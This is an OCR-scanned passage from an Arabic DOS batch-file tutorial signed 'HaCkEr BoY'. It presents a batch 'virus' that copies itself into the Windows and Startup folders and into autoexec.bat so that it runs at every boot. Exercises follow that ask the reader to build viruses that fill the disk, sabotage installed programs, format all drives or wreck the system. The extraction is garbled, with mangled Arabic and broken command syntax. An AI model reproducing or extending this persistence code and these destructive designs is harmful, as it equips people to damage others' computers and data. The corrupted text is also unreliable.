و للضمان» سندخل أمر في ملف ٥×6٥.04‏ ٠ا۸‏ يقوم بتشغيل الفايرس عند بدء تشغيل ويندوز» وذلك باستخدام 
الطريقة << كالتالي: 
COPY batchfilename.bat Yowindir%o\‏ 
ECHO >>%SystemDrive%o\autoexec.bat‏ 


ECHO CALL %windir%o\batchfilename. bat >=>YoSystemDrive%o\autoexec. bat 


و بهذا الشكل نكون قد أضفنا الفايرس إلى قائمة بدء التشغيل و ملف هط .٥ع×عautu‏ 


وفي نهاية العمل (وبعد وضع بعض الكماليات)ء سيصبح الكود النهائي للفايرس كالتالي: 
@ECHO OFF‏ 

BREAK OFF 

ECHO HeLlO I aM ^HaCkEr BoY^ hOw aRe yOu?.. HoW Is yOuR CoMpUtEr? 
START %batchfilename.bat 

COPY batchfilename.bat YY USERPROFILE% \Start~1\Programs\Startup\ 


COPY batchfilename.bat %windir%o\ 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


ECHO >>%SystemDrive%o\autoexec.bat 


ECHO CALL %windir%o\batchfilename. bat >>YoSystemDrive%o\autoexec.bat 


خاول أن تقراً الكود سطرا سطراء وستفهمه بالتأكيد. 
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كتاب دوس .. وصو لا لبرمجة الملفات الدفعية ^HaCkEr BoY^‏ 


تمارین : 


اصنع فایرس يقوم بنسخ نفسه بعدد لا نهائي حتی يمتلئ الهارد. (ضس مبدا آخر فايرس) 

اصنع ملفا يقوم بتغيير الفهرس الافتراضي لتنصيب البرامج على النظام. (لامر ۴۲؟) 

اصنع ملفاً يقوم بإفراغ مجلد الملفات المؤقتة .)۲٤(‏ (لامر ۴۲؟) 

اصنع ملفا يقوم بتخريب كافة البرامج المثبتة على النظام. (الأمر ۲۸1۲) 

اصنع فيروساً يقوم بالعمل مرة واحدة» ثم يدخل في سبات لمدة أسبوع. (لأئر ه) 

اضاتع قز وسا يقوم بتخريب النظام دون حذف كافة الملفات. (حذف إحدى الملفات الخطيرة أو تضليل النظام) 


ل ڄ نن طط ئ ى ل 


اصنع فيروساً يقوم بفرمتتة كافة السواقات المحتمل وجودها في الجهاز . (الأر ۴0۸۸/۸7) 
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اسم الملف: 
الدليل: 
القالب: 


دوس والملفات الدفعية.ءمل 
E:\Learning\Bat Files\Doc's‏ 
C:\Documents and Settings\SamerBakkar\Application‏ 


Data\Microsoft\Templates\Normal.dot 


العنوان: 

الموضوع: 

الكاتب: 

تعليقات: 

تاریخ الإنشاء: 

رقم التغيير : 

الحفظ الأخير بتاريخ: 
الحفظ الأخير بقلم: 


زمن التحرير الإجمالي: 


الطباعة الأخيرة: 

منذ آخر طباعة كاملة 
عدد الصفحات: 
عدد الكلمات: 
عدد الأحرف: 


کتاب دوس 


Samer Bakkar 


PM 1:07 2005/27/9 
294 

AM 6:46 2005/16/10 
Samer Bakkar 

1 دقائق 
AM 7:02 2005/16/10‏ 
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4 (تقريباً) 
7 (تقریبا) 


